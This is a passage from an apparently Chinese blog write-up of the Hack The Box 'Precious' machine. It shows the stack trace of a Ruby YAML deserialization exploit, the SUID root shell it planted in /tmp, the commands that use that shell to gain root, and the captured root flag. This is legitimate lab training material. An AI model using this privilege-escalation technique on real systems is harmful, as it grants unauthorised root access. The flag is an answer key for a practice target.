        14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive'
        13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in `init_with'
        12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with'
        11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in `yaml_initialize'
        10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements'
         9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in `each'
         8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from'
         7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in `read'
         6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG'
         5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
         4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
         3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in `resolve'
         2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `<<'
         1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)
henry@precious:/tmp$ ls -la
total 1256
drwxrwxrwt 11 root  root     4096 Dec 29 04:32 .
drwxr-xr-x 18 root  root     4096 Nov 21  2022 ..
-rw-r--r--  1 henry henry     647 Dec 29 04:32 dependencies.yml
drwxrwxrwt  2 root  root     4096 Dec 29 02:44 .font-unix
drwxrwxrwt  2 root  root     4096 Dec 29 02:44 .ICE-unix
drwxr-xr-x  5 root  root     4096 Dec 29 03:44 passenger.kCXMasI
drwx------  2 ruby  ruby     4096 Dec 29 02:59 runtime-ruby
-rwsrwsrwx  1 root  root  1234376 Dec 29 04:32 shiyan
drwx------  3 root  root     4096 Dec 29 02:44 systemd-private-53b6be14bf5c49bf890a413f1840c4c8-systemd-logind.service-FqYTxg
drwxrwxrwt  2 root  root     4096 Dec 29 02:44 .Test-unix
drwx------  2 root  root     4096 Dec 29 02:44 vmware-root_401-1857883248
drwxrwxrwt  2 root  root     4096 Dec 29 02:44 .X11-unix
drwxrwxrwt  2 root  root     4096 Dec 29 02:44 .XIM-unix
henry@precious:/tmp$ shiyan -p
-bash: shiyan: command not found
henry@precious:/tmp$ ./shiyan -p
shiyan-5.1# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
shiyan-5.1# cat /root/root.txt
68916c4ed77ad356f7217b51bb3b984f
shiyan-5.1#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/513

打靶记

#shooting-range

Precious-htb-writeup

https://sh1yan.top/2023/12/29/Precious-htb-writeup/

作者

shiyan

发布于

2023年12月29日

许可协议

Popcorn-htb-writeup 上一篇

Paper-htb-writeup 下一篇